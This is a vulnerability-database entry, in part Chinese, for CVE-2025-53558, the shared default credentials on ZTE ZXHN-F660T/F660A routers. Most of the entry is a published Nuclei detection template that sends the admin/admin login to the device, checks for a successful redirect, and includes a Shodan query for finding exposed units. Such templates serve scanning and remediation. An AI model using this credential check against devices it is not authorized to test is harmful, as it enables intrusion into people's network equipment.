漏洞描述
ZXHN-F660T and ZXHN-F660A provided by ZTE Japan K.K. use a common credential for all installations. With the knowledge of the credential, an attacker may log in to the affected devices.
CVE-2025-53558: ZTE ZXHN-F660T/F660A - Default Credentials
PoC代码[已公开]
id: CVE-2025-53558
info:
name: ZTE ZXHN-F660T/F660A - Default Credentials
author: DhiyaneshDK
severity: high
description: |
ZXHN-F660T and ZXHN-F660A provided by ZTE Japan K.K. use a common credential for all installations. With the knowledge of the credential, an attacker may log in to the affected devices.
impact: |
Attackers with knowledge of common credentials can access ZTE device management interfaces, potentially gaining control over network equipment and configurations.
remediation: |
Change default credentials immediately and restrict access to the web management interface to trusted administrators only.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-53558
- https://jvn.jp/en/jp/JVN66546573/
metadata:
shodan-query: title:"F660"
verified: true
max-request: 1
tags: cve,cve2025,default-login,zte,vuln
variables:
username: "admin"
password: "admin"
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Referer: {{RootURL}}
frashnum=&action=login&Frm_Logintoken=0&Username={{username}}&Password={{password}}
matchers-condition: and
matchers:
- type: word
part: location
words:
- "/start.ghtml"
- type: status
status:
- 302
- type: word
part: body
words:
- "wrong username"
- "User information is error"
negative: true
# digest: 4a0a004730450220597e41711be209eaa60b6927fa4024b081a032f75c1f3b3cc42e2660313bc26c0221009fdc46dbeb1fcfe55f68adbf68843a3149e5f637c363c175db67a48ce4bfecd6:922c64590222798bb761d5b6d8e72950